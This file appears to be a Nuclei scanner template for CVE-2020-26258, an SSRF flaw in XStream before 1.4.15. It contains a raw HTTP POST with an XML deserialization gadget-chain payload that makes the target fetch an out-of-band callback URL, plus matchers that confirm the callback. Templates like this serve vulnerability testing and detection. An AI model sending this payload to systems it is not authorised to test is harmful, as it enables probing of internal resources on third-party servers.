56 lines
1.8 KiB
YAML
56 lines
1.8 KiB
YAML
id: CVE-2020-26258
|
|
|
|
info:
|
|
name: Xstream < 1.4.15 - Server Side Request Forgery
|
|
author: pwnhxl
|
|
severity: high
|
|
description: |
|
|
XStream before version 1.4.15, a Server-Side Forgery Request vulnerability can be activated when unmarshalling. The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream.
|
|
reference:
|
|
- https://x-stream.github.io/CVE-2020-26258.html
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258
|
|
- https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
|
|
cvss-score: 7.7
|
|
cve-id: CVE-2020-26258
|
|
cwe-id: CWE-918
|
|
tags: cve,cve2020,xstream,ssrf,oast
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/xml
|
|
|
|
<map>
|
|
<entry>
|
|
<jdk.nashorn.internal.objects.NativeString>
|
|
<flags>0</flags>
|
|
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
|
|
<dataHandler>
|
|
<dataSource class='javax.activation.URLDataSource'>
|
|
<url>http://{{interactsh-url}}/internal/:</url>
|
|
</dataSource>
|
|
<transferFlavors/>
|
|
</dataHandler>
|
|
<dataLen>0</dataLen>
|
|
</value>
|
|
</jdk.nashorn.internal.objects.NativeString>
|
|
<string>test</string>
|
|
</entry>
|
|
</map>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "User-Agent: Java"
|